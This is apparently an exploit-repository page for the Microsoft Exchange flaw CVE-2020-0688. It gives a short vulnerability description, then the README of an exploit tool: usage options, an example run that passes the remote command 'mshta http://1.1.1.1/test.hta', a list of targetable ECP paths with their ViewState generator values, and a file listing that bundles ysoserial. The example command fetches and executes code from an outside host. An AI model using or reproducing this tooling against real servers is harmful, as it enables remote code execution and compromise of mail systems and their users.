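Related vulnerability
Title:
Microsoft Exchange Server authorization issue vulnerability
(CVE-2020-0688)
Description: Microsoft Exchange Server is an e-mail server product from Microsoft Corporation (USA). It provides mail access, storage and forwarding, voice mail, mail filtering and similar functions. An authorization issue vulnerability exists in Microsoft Exchange Server; it stems from the program failing to correctly handle objects in memory. An attacker can use a specially crafted e-mail to exploit the vulnerability and run arbitrary code in the context of the system user. The following products and versions are affected: Microsoft Exchange Server 2010, Microsoft Exchange Server 2013, Micro
Description
CVE-2020-0688_EXP Auto trigger payload & encrypt method
Introduction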
# CVE-2020-0688_EXP
CVE-2020-0688_EXP Auto trigger payload
```
python3 CVE-2020-0688_EXP.py -h
usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e]
optional arguments:
-h, --help show this help message and exit
-s SERVER, --server ECP Server URL Example: http://ip/owa
-u USER, --user USER login account Example: domain\user
-p PASSWORD, --password PASSWORD
-c CMD, --cmd CMD Command u want to execute
-e, --encrypt Encrypt the payload
```
example:
```
python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u user@x.com -p passwd -c "mshta http://1.1.1.1/test.hta"
```
Other available paths:
```
/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/Organize/AutomaticReplies.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/RulesEditor/InboxRules.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Organize/DeliveryReports.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/MyGroups/PersonalGroups.aspx?showhelp=false&__VIEWSTATEGENERATOR=A767F62B
/ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&id=38f4bec5-704f-4272-a654-95d53150e2ae&ReturnObjectType=1&__VIEWSTATEGENERATOR=321473B8
/ecp/Customize/Messaging.aspx?showhelp=false&__VIEWSTATEGENERATOR=9C5731F0
/ecp/Customize/General.aspx?showhelp=false&__VIEWSTATEGENERATOR=72B13321
/ecp/Customize/Calendar.aspx?showhelp=false&__VIEWSTATEGENERATOR=4AD51055
/ecp/Customize/SentItems.aspx?showhelp=false&__VIEWSTATEGENERATOR=4466B13F
/ecp/PersonalSettings/Password.aspx?showhelp=false&__VIEWSTATEGENERATOR=59543DCA
/ecp/SMS/TextMessaging.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/TroubleShooting/MobileDevices.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Customize/Regional.aspx?showhelp=false&__VIEWSTATEGENERATOR=9097CD08
/ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&ReturnObjectType=1__VIEWSTATEGENERATOR=FD338EE0
/ecp/Security/BlockOrAllow.aspx?showhelp=false&__VIEWSTATEGENERATOR=362253EF
```
File snapshot
[4.0K] /data/pocs/c2068dc84c3ca17c10fb13446b0cf3202e204d2f
├── [4.7K] CVE-2020-0688_EXP.py
├── [2.1K] README.md
└── [4.0K] ysoserial-1.32
    ├── [ 44K] fastjson.dll
    ├── [1.3M] FSharp.Core.dll
    ├── [605K] FSharp.Core.xml
    ├── [8.5K] FsPickler.CSharp.dll
    ├── [ 14K] FsPickler.CSharp.xml
    ├── [947K] FsPickler.dll
    ├── [ 68K] FsPickler.Json.dll
    ├── [6.0K] FsPickler.Json.xml
    ├── [129K] FsPickler.xml
    ├── [1.1M] microsoft.identitymodel.dll
    ├── [1.3M] Microsoft.PowerShell.Editor.dll
    ├── [ 22K] NDesk.Options.dll
    ├── [638K] Newtonsoft.Json.dll
    ├── [658K] Newtonsoft.Json.xml
    ├── [5.7M] System.Management.Automation.dll
    ├── [198K] YamlDotNet.dll
    ├── [242K] YamlDotNet.xml
    ├── [133K] ysoserial.exe
    └── [ 540] ysoserial.exe.config
1 directory, 21 files